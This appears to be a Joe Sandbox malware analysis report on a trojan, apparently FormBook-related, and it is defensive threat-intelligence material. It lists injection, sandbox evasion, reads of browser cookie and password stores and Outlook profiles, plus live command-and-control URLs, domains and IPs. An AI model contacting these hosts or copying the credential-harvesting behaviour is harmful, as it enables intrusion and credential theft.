                Source: Yara match | File source: 00000001.00000002.2269397258.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.2268552454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3015861642.00000000048D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\ROUTE.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\ROUTE.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\ROUTE.EXE | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\ROUTE.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\ROUTE.EXE | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\ROUTE.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\ROUTE.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\ROUTE.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: qlG7x91YXH.exe | Binary or memory string: WIN_81
                Source: qlG7x91YXH.exe | Binary or memory string: WIN_XP
                Source: qlG7x91YXH.exe, 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: qlG7x91YXH.exe, 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: qlG7x91YXH.exeBinary or memory string: WIN_XPe
                Source: qlG7x91YXH.exeBinary or memory string: WIN_VISTA
                Source: qlG7x91YXH.exeBinary or memory string: WIN_7
                Source: qlG7x91YXH.exeBinary or memory string: WIN_8

                Remote Access Functionality

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.2268978745.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3014344224.0000000002A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3015748227.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3015655468.0000000001430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3014639405.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2269397258.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2268552454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3015861642.00000000048D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DF1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_00DF1204
Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DF1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00DF1806
MITRE ATT&CK Matrix (number before a technique name as shown in the report)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 31 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 Software Packing | LSA Secrets | 341 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 1 DLL Side-Loading | Cached Domain Credentials | 12 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Valid Accounts | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 21 Access Token Manipulation | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 412 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Behavior Graph ID: 1587751 | Sample: qlG7x91YXH.exe | Start date: 10/01/2025 | Architecture: WINDOWS | Score: 100

Start
  DNS/IP: www.313333.xyz (Performs DNS queries to domains with low reputation); www.wuyyv4tq.top; 3 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Icon mismatch, binary includes an icon from a different legit application in order to fool users; Multi AV Scanner detection for submitted file; 4 other signatures
  qlG7x91YXH.exe 4 (started)
    Signatures: Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 3 other signatures
    svchost.exe (started)
      Signatures: Maps a DLL or memory area into another process
      sUcUmdUxGfN.exe (injected)
        Signatures: Found direct / indirect Syscall (likely to bypass EDR)
        ROUTE.EXE 13 (started)
          Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
          sUcUmdUxGfN.exe (injected)
            DNS/IP: www.313333.xyz 103.120.80.111, ports 49933, 49951, 49968, WEST263GO-HKWest263InternationalLimitedHK, Hong Kong; www.wuyyv4tq.top 156.226.63.13, ports 49827, 80, COMING-ASABCDEGROUPCOMPANYLIMITEDHK, Seychelles; 2 other IPs or domains
            Signatures: Found direct / indirect Syscall (likely to bypass EDR)
          firefox.exe (started)

Source | Detection | Scanner | Label
qlG7x91YXH.exe | 76% | Virustotal |
qlG7x91YXH.exe | 74% | ReversingLabs | Win32.Trojan.AutoitInject
qlG7x91YXH.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://www.wuyyv4tq.top/0qmw/?3fo=rJKpKBC&h0Z4uv=278+fPNRLmRxSvCH34hbLODYmABWu8vkjuqqbvjl/R4r9MC/xh0rLSqKPcdQtIyz70t8P1XMFdXw2YmeVp9Igz5U6icI9PUQLWv4eV+o4CclGEV4ym29rSk= | 0% | Avira URL Cloud | safe
http://www.313333.xyz/5jna/ | 0% | Avira URL Cloud | safe
https://www.west.cn/cloudhost/ | 0% | Avira URL Cloud | safe
http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg) | 0% | Avira URL Cloud | safe
https://www.west.cn/jiaoyi/ | 0% | Avira URL Cloud | safe
https://www.west.cn/ykj/view.asp?domain=313333.xyz | 0% | Avira URL Cloud | safe
http://www.mzkd6gp5.top | 0% | Avira URL Cloud | safe
https://www.west.cn/services/mail/ | 0% | Avira URL Cloud | safe
https://www.west.cn/services/webhosting/ | 0% | Avira URL Cloud | safe
https://www.west.cn/services/domain/ | 0% | Avira URL Cloud | safe
http://www.313333.xyz/5jna/?h0Z4uv=o8GwGASYBJt/nb/piMB5DNiJPc8rJicYda1NcmeQznd2DA1k1E5AtP7RU4WuyFuLPAN95z5B1yv6cgM9wMfZloOraKLvaksg7S1pHUhIybvdcNjqXcBCCD0=&3fo=rJKpKBC | 0% | Avira URL Cloud | safe
http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg) | 0% | Avira URL Cloud | safe
http://www.mzkd6gp5.top/0hqe/ | 0% | Avira URL Cloud | safe
http://www.mzkd6gp5.top/0hqe/?h0Z4uv=DKA1iVPcoZUjyp2kMNYgPydN8TVlv2BCRXxU2Kub3rtTiJbt+pfDiXzRopvp7VMLzDHcJo8PeW6VBgWmqyKjijxSdggTsAG5c4hPlmGpc/Wen6gVL7B2F3s=&3fo=rJKpKBC | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.epayassist.net | 208.91.197.27 | true | true | | unknown
www.mzkd6gp5.top | 104.21.80.1 | true | true | | unknown
www.mosquitoxp.lol | 127.0.0.1 | true | false | | unknown
www.313333.xyz | 103.120.80.111 | true | true | | unknown
www.wuyyv4tq.top | 156.226.63.13 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.wuyyv4tq.top/0qmw/?3fo=rJKpKBC&h0Z4uv=278+fPNRLmRxSvCH34hbLODYmABWu8vkjuqqbvjl/R4r9MC/xh0rLSqKPcdQtIyz70t8P1XMFdXw2YmeVp9Igz5U6icI9PUQLWv4eV+o4CclGEV4ym29rSk= | true | Avira URL Cloud: safe | unknown
http://www.313333.xyz/5jna/ | true | Avira URL Cloud: safe | unknown
http://www.313333.xyz/5jna/?h0Z4uv=o8GwGASYBJt/nb/piMB5DNiJPc8rJicYda1NcmeQznd2DA1k1E5AtP7RU4WuyFuLPAN95z5B1yv6cgM9wMfZloOraKLvaksg7S1pHUhIybvdcNjqXcBCCD0=&3fo=rJKpKBC | true | Avira URL Cloud: safe | unknown
http://www.mzkd6gp5.top/0hqe/ | true | Avira URL Cloud: safe | unknown
http://www.mzkd6gp5.top/0hqe/?h0Z4uv=DKA1iVPcoZUjyp2kMNYgPydN8TVlv2BCRXxU2Kub3rtTiJbt+pfDiXzRopvp7VMLzDHcJo8PeW6VBgWmqyKjijxSdggTsAG5c4hPlmGpc/Wen6gVL7B2F3s=&3fo=rJKpKBC | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.west.cn/ykj/view.asp?domain=313333.xyz | ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.mzkd6gp5.top | sUcUmdUxGfN.exe, 00000007.00000002.3015655468.00000000014B4000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg) | ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.west.cn/services/webhosting/ | ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.west.cn/jiaoyi/ | ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.west.cn/services/domain/ | ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.west.cn/services/mail/ | ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72 | ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://www.west.cn/cloudhost/ | ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg) | ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
103.120.80.111 | www.313333.xyz | Hong Kong | 139021 | WEST263GO-HKWest263InternationalLimitedHK | true
156.226.63.13 | www.wuyyv4tq.top | Seychelles | 133201 | COMING-ASABCDEGROUPCOMPANYLIMITEDHK | true
104.21.80.1 | www.mzkd6gp5.top | United States | 13335 | CLOUDFLARENETUS | true

IP
127.0.0.1
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1587751
Start date and time: 2025-01-10 17:42:18 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: qlG7x91YXH.exe (renamed because original name is a hash value)
Original Sample Name: f57ac51331e5239f4cae4e94cbeb985860a6304b5e4822e638e7122915d8a7a2.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@5/4
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 53
• Number of non-executed functions: 292
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target sUcUmdUxGfN.exe, PID 5308 because it is empty
• Not all processes were analyzed; report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
Time | Type | Description
11:44:44 | API Interceptor | 676032x Sleep call for process: ROUTE.EXE modified
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            103.120.80.111CJE003889.exeGet hashmaliciousFormBookBrowse
                                            • www.313333.xyz/5jna/
                                            Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                            • www.cotti.club/3ej6/
                                            Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                            • www.cotti.club/3ej6/
                                            pismo1A 12.06.2024.exeGet hashmaliciousFormBookBrowse
                                            • www.zhuan-tou.com/lx5p/
                                            CFV20240600121.exeGet hashmaliciousFormBookBrowse
                                            • www.zhuan-tou.com/lx5p/
                                            BMhDm7YW62.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                            • www.633922.com/m858/?yRV=coEloaOWB4ccjb+v6cLGO3+aXUsmpIWjCRRWxfkEZg7Qbr+sYY/0Gc0G57svkQNplbCaP8Xe0B9P1hE+GhuMVBij7PKQzh7NHQ==&GJ=C4IdWhJXSFOXR8D
                                            Payment_Copy_[SWIFT_COPY].exeGet hashmaliciousFormBook, NSISDropperBrowse
                                            • www.633922.com/m858/
                                            Invoice_&_SOA_ready_for_dispatch.exeGet hashmaliciousFormBookBrowse
                                            • www.633922.com/udwf/?G0Yxd2Q=EgoyY5F9PuSC7IWgflDFG7vO7ChOxNSXUZQtmoKTqYmDoJiW0KocQ9ej5sZbxdFlzd/pkXvUfPTapOCXwmOa8U5eEphhhK4tvg==&pp=dZa4
                                            Request_List.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • www.633922.com/oiwu/?Jz0HU=+L/6O+Q8u+ajcbZGgAmmZd+NMVb04NFrpK29B3gBvKtIEVSU5Z3YQVU7jFSO9jVfLdoVnndqUGYQzkOx6q7e3NvCIXwJmOpdTA==&M4=XF_T
                                            881SP1exr1.exeGet hashmaliciousFormBookBrowse
                                            • www.lpqxmz.site/4hc5/?ntxh9=V48LzvX0&P6=245SFh9gPs7u7SMvCZq1WQwUtHwLu6OXJLdJjwoxg6CFn9y4LEhCSrC/ms6Ftk+AVu/2
                                            156.226.63.13z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                            • www.wuyyv4tq.top/mrxb/
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            www.epayassist.netCJE003889.exeGet hashmaliciousFormBookBrowse
                                            • 208.91.197.27
                                            www.313333.xyzCJE003889.exeGet hashmaliciousFormBookBrowse
                                            • 103.120.80.111
                                            www.wuyyv4tq.topz1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                            • 156.226.63.13
                                            CJE003889.exeGet hashmaliciousFormBookBrowse
                                            • 156.226.63.13
                                            www.mzkd6gp5.top1162-201.exeGet hashmaliciousFormBookBrowse
                                            • 104.21.64.1
                                            QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                            • 104.21.32.1
                                            QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                            • 104.21.96.1
                                            QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                            • 104.21.64.1
                                            CJE003889.exeGet hashmaliciousFormBookBrowse
                                            • 172.67.158.81
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WEST263GO-HKWest263InternationalLimitedHK | sora.arm7.elf | malicious | Unknown | 103.24.254.164
 | CJE003889.exe | malicious | FormBook | 103.120.80.111
 | jew.mpsl.elf | malicious | Unknown | 218.247.91.232
 | Payment&WarantyBonds.exe | malicious | FormBook | 103.120.80.111
 | Payment&WarantyBonds.exe | malicious | FormBook | 103.120.80.111
 | la.bot.powerpc.elf | malicious | Unknown | 218.247.91.241
 | SecuriteInfo.com.Heur.29270.15038.exe | malicious | PureLog Stealer | 218.247.64.168
 | tVdq8lEt3e.elf | malicious | Mirai, Okiru | 103.108.227.184
 | PROFORMA INVOICE BKS-0121-24-25-JP240604.exe | malicious | FormBook | 218.247.68.184
 | p4LNUqyKZM.exe | malicious | FormBook | 218.247.68.184
CLOUDFLARENETUS | 44742054371077666.js | malicious | Strela Downloader | 172.64.41.3
 | http://atozpdfbooks.com | malicious | Unknown | 104.17.25.14
 | http://infarmbureau.com | malicious | Unknown | 104.16.40.28
 | r5yYt97sfB.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.80.1
 | RmIYOfX0yO.exe | malicious | GuLoader, Snake Keylogger | 104.21.80.1
 | zAK7HHniGW.exe | malicious | Snake Keylogger | 104.21.112.1
 | MtxN2qEWpW.exe | malicious | Snake Keylogger | 104.21.112.1
 | IUqsn1SBGy.exe | malicious | AgentTesla | 104.26.13.205
 | 8nkdC8daWi.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.96.1
 | b5JCISnBV1.exe | malicious | Snake Keylogger | 104.21.16.1
COMING-ASABCDEGROUPCOMPANYLIMITEDHK | http://38133.xc.05cg.com/ | malicious | Unknown | 156.224.208.119
 | http://40608.xc.05cg.com/ | malicious | Unknown | 156.224.208.119
 | emips.elf | malicious | Mirai | 156.250.110.142
 | PO_62401394_MITech_20250601.exe | malicious | FormBook | 154.197.162.239
 | Order Inquiry.exe | malicious | FormBook | 154.197.162.239
 | armv6l.elf | malicious | Mirai | 154.197.141.202
 | Payment Receipt.exe | malicious | FormBook | 154.197.162.239
 | inv#12180.exe | malicious | FormBook | 154.197.162.239
 | vcimanagement.i586.elf | malicious | Gafgyt, Mirai | 156.241.105.229
 | vcimanagement.armv5l.elf | malicious | Gafgyt, Mirai | 156.241.72.39
                                            No context
                                            No context
                                            Process:C:\Windows\SysWOW64\ROUTE.EXE
